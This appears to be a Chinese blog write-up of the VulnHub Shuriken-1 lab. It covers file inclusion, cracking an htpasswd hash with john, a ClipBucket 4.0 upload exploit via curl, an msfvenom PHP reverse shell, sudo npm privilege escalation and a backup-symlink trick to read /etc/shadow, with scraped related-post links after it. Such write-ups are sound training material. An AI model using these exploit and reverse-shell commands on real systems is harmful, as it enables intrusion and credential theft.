Shuriken-1靶机总结
Shuriken-1靶机渗透总结
靶机下载地址:
https://download.vulnhub.com/shuriken/Shuriken-1.ova
将Shuriken-1虚拟机设为NAT模式后,打开虚拟机,通过nmap扫描出其ip和端口
通过开放的80端口,打开网站
信息收集,发现js文件存在两个链接
尝试去打开链接,发现了一个存在文件包含的地方
Broadcas.shuriken.local无法直接打开,需要加到hosts文件中
打开网站后发现需要登录
尝试通过文件包含读取apache2的配置文件,发现了存放密码的路径,紧接着去读取密码
/etc/apache2/sites-enabled/000-default.conf
读取到了密码developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
接下来就是对密码的破解,这里利用john工具
john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/hash john --show /home/kali/Desktop/hash
破解后的密码: 9972761drmfsls
并且登录后发现是ClipBucket 4.0
尝试去网上搜寻符合符合的漏洞,在exploit网站找到一个,可以文件上传的exploit
curl --basic --user "developers:9972761drmfsls" -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" http://broadcast.shuriken.local/actions/beats_uploader.php
准备要上传的文件,这里上传一个msfvenom生成的shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.11.131 LPORT=12345 -f raw -o /home/kali/Desktop/shell.php
通过上传成功后返回的文件名和后缀加路径,可以找到上传的php文件,并且运行
http://broadcast.shuriken.local/actions/CB_BEATS_UPLOAD_DIR/
在kali里面利用msf开启监听,成功连接shuriken靶机
当前用户是www-data,考虑提权,经过发现,使用sudo –l 命令
看到了server-management用户无密码使用npm命令,存在sudo滥用提权
并且在https://gtfobins.github.io/找到了对应的提权命令touch package.json echo '{"scripts":{"dev":"/bin/bash"}}' > package.json sudo -u server-management npm run dev
成功提权到server-management用户
在server-management用户的家目录下发现了user.txt
获得了第一个flag
67528b07b382dfaa490f4dffc57dcdc0
紧接着考虑提权至root的方法
这里没有找到提权的方法
但是发现了一个奇怪的进程
经过查看backupsrv.sh内容
大概理解这个进程的作用是,在/var/backups目录下生成一个tgz文件
文件名字是时间和主机名字的组合
并且tgz文件的内容是/home/server-management/Documents目录里面的内容
利用这点,我们可以下载/etc的文件
观察了一下,该sh大概每分钟会被执行一次,由于sh中参数不能修改,于是这里删除了/home/server-management/Documents文件夹,做了/etc到Documents的软连接,压缩成功后将其拷贝到/var/www/main(注意:需切换到www-data用户),下载后获取到shadow文件
cp /var/backups/shuriken-Sunday.tgz /var/www/main
下载之后,对应的tgz文件内容是对应的/etc的文件内容,在里面打开了shadow文件,获取了root的密码,但是这里不会解密
$6$KEYGm0ZQ$oTT3SYXna/5H61MZCwqvY995xtDqHGaMe5LRrMXNtVLLDVwfoj.DtJ0AQk6wfhAfOW23uR6wqd7UC5I7MPq0a0
无法解密,直接同步骤将/root文件下载下来,打开里面的root.txt文件
获取了第二个flag
d0f9655a4454ac54e3002265d40b2edd
Shuriken-1靶机总结相关推荐
- 靶机渗透练习90-Grotesque:1.0.1
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- HA: InfinityStones靶机渗透测试
文章目录 靶机信息 一.信息收集 1.主机发现 2.端口扫描 3.目录扫描 二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...
- HA: Forensics靶机渗透测试
文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...
- HA: Dhanush靶机渗透测试
文章目录 一.信息收集 1.主机发现 2.端口扫描 3.查看 web 服务 二.漏洞挖掘 1.使用 cewl 生成字典 2.使用 hydra 进行爆破 3.ssh 连接 4.尝试 sudo 提权 靶机 ...
- Lampiao靶机渗透测试
文章目录 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.查看对方web服务 2.使用 msfconsole get shell 脏牛提权漏洞(CVE-2016-5191) 三.脏牛提权 ...
- 漏洞payload 靶机_【CS学习笔记】5、如何建立Payload处理器
这一小节学起来感觉有些吃力,里面很多概念理解的不是很清楚,如果有大佬看到描述错误的地方欢迎留言指正,避免误导他人. 再次声明,这只是我的个人学习笔记,不要当成教程去看,建议想学习CS的小伙伴可以看看A ...
- docker 漏洞测试 靶机环境 靶机平台 vulhub vulapps 简介
在实际学习中,经常需要模拟不同的漏洞环境,而使用公网的实例的话,多多少少又存在一些风险,因此能搭建一个本地的模拟环境去测试漏洞是一个不错的方案.Docker是近两年来十分流行的开源容器引擎,因此也出现 ...
- php %3c php 攻击,web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
最新文章
- CentOS7搭建NTP服务器
- Spring学习之旅(四):面向切面编程(AOP)
- Linux中使用Systemtap调试SLUB
- linux重启python服务_如何将python脚本作为linux服务启动
- vue 开发中element-ui库的switch开关绑定number类型数据不成功问题 解决方法
- 学python后到底能干什么-学Python后到底能干什么
- 《游戏编程模式》一第7章 状态模式
- Java之品优购课程讲义_day09(2)
- 【AT91SAM9261EK】u-boot 2022 tftpboot 烧写根文件系统
- Android速度仪表盘,速度评级小车动画(模仿电脑版360宽带测速器)
- 关于阿里云短信验证服务完整的教程
- NumberOptional:一个字符串转数字的工具
- 用java实现楼层导航_楼层导航
- 1080p和1080i
- 手把手教你用jQuery Mobile做相册
- 使用FFMpeg将音频PCM数据生成WAV和MP3文件
- VirtualBox错误:VERR_NEM_VM_CREATE_FAILED: What do I do?
- 【读书笔记】描述个人优势的34个主题--《现在,发现你的优势》
- 航空发动机数据-C-MAPSS数据集的个人理解
- iOS开发之Objective-C(面试篇)-李飞-专题视频课程
热门文章
- matlab中性点模块,Matlab-SimPowerSystems-Elements模块使用说明
- 解决UnicodeDecodeError: 'ascii' codec can't decode byte 0xcf in position 7: ordinal not in range(128)
- 读《现代软件工程基础》后三问
- 【DEVOPS】传统业务软件企业之痛
- 2019 Android手机系统版本分布情况
- VMware虚拟机IP地址不分配
- ssh连接mysql数据库导入_ssh向数据库导入数据库
- N76E003,C51开发不编译
- Ubuntu 18.04上安装Skype
- Adobe 使用 AI 识别 PS “照骗”;Java 要被 kotlin 打败了?